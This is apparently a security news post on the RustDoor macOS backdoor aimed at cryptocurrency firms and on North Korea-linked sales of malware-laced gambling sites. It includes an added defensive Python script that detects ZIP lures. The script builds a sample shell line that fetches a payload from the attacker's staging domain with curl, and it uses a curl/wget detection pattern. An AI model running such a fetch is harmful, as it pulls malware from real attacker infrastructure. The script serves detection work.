Rustdoor
23 Feb

Cryptocurrency Sector Targeted by Sophisticated macOS Backdoor RustDoor

A newly discovered Apple macOS backdoor, dubbed RustDoor, has targeted several cryptocurrency companies. Bitdefender revealed RustDoor as a Rust-based malware that masquerades as a Visual Studio update.

It can harvest and upload files, gather system information, and is distributed via fake job-offer PDFs. The attack chain includes ZIP archives containing shell scripts that fetch the implant from a website, turkishfurniture[.]blog, along with decoy PDFs. Bitdefender uncovered additional first-stage payloads posing as job offers that predate the RustDoor binaries by almost a month. Four new Golang-based binaries communicate with a domain controlled by the threat actor, collecting system and network information using macOS utilities. They extract disk details and kernel configurations, while a leaky command-and-control endpoint reveals information about infected victims.

Meanwhile, South Korea's National Intelligence Service disclosed that an IT organization linked to North Korea's Workers' Party is generating revenue by selling malware-infected gambling websites. Gyeongheung, a 15-member entity based in Dandong, allegedly received payments for creating and maintaining these websites for cybercriminals. An unidentified South Korean criminal organization paid $5,000 for a single website and $3,000 monthly for maintenance.
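A triage check for the lure described above (a ZIP bundling a decoy PDF with a shell script that pulls a second stage from turkishfurniture[.]blog), written here as an added example and not code from Bitdefender or the article; the archive contents are constructed, and the function names are my own.

```python
import io
import re
import zipfile

# Indicator from the article (defanged there as turkishfurniture[.]blog).
STAGING_DOMAIN = "turkishfurniture.blog"
FETCH_RE = re.compile(r"\b(curl|wget)\b[^\n]*" + re.escape(STAGING_DOMAIN), re.I)


def scan_archive(zip_bytes: bytes) -> dict:
    """Summarise a ZIP: decoy PDFs, shell scripts, and scripts that fetch
    from the known staging domain. Flags the decoy-plus-script pattern."""
    findings = {"decoy_pdfs": [], "shell_scripts": [], "fetches_implant": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name, data = info.filename, zf.read(info)
            # Check content magic as well as extension: names are attacker-chosen.
            if name.lower().endswith(".pdf") or data.startswith(b"%PDF"):
                findings["decoy_pdfs"].append(name)
            if name.lower().endswith(".sh") or data.startswith(b"#!"):
                findings["shell_scripts"].append(name)
                text = data.decode("utf-8", errors="replace")
                if STAGING_DOMAIN in text or FETCH_RE.search(text):
                    findings["fetches_implant"].append(name)
    findings["suspicious"] = bool(findings["fetches_implant"]) or (
        bool(findings["decoy_pdfs"]) and bool(findings["shell_scripts"])
    )
    return findings


def build_sample_zip(include_script: bool = True) -> bytes:
    """Constructed sample mirroring the described lure; not a real specimen."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Job_Offer.pdf", b"%PDF-1.4\n% constructed decoy document\n")
        if include_script:
            zf.writestr("open.sh", "#!/bin/sh\ncurl -sO https://turkishfurniture.blog/update\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_archive(build_sample_zip()))
```

In production the domain list would come from a threat-intel feed rather than a constant, and the same check can be run over mail attachments before delivery.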

The revelation of RustDoor targeting cryptocurrency companies underscores the growing threat landscape facing digital assets. Its sophisticated distribution method and capabilities highlight the need for robust cybersecurity measures in the cryptocurrency sector. Additionally, the involvement of North Korean-affiliated groups in illicit activities further amplifies concerns over state-sponsored cybercrime.


The monetization of malware-laced gambling websites demonstrates the evolving tactics of cybercriminal organizations to exploit unsuspecting victims for financial gain. As such, vigilance and collaboration among cybersecurity experts and law enforcement agencies are crucial in combating these threats and safeguarding against potential breaches.